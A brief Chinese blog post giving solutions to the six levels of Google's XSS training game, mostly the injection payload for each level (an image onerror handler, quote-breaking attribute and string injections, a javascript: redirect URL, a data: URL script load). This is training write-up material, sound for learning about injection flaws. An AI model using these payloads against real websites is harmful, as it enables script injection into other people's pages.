xss-game

Level 1: Hello, world of XSS

使用<img src=x onerror=alert(1)>

Level 2: Persistence is key

使用<img src=x onerror=alert(1)>

Level 3: That sinking feeling...

使用' onerror='alert(1);//

Level 4: Context matters

使用'+alert(1)+'

Level 5: Breaking protocol

将url修改为https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert()

Level 6: Follow the 🐇

将url修改为 https://xss-game.appspot.com/level6/frame#data:text/javascript ,alert('1')

posted @ 2026-02-10 21:01  大雪深埋  阅读(10)  评论(0)    收藏  举报
// 正常配置 window.cnblogsConfig = { links: {}, }; // 友链页配置 window.cnblogsConfig.links.page = [ { title: '友情链接', // 标题 icon: 'icon-lianjie', // iconfont style: 'color: #a78bfa;', links: [ { name: '2_haowen_V', // 昵称 introduction: 'IT技术类博客', // 简介 avatar: 'https://pic.cnblogs.com/face/1334215/20180504110551.png', // 头像 url: 'https://www.hehaowen.com.cn/' // 友链地址 }, ] }, ];